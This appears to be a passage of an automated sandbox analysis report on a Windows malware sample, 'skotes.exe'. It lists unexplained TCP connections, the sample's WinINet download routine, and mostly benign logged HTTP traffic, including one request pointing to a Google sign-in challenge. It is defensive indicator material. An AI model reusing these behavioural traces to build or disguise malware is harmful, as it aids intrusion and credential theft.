Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DABE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 5_2_00DABE30
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7xNGWLB7eDUzHSk&MD=4dvuXYOy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7xNGWLB7eDUzHSk&MD=4dvuXYOy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/1.1Host: youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
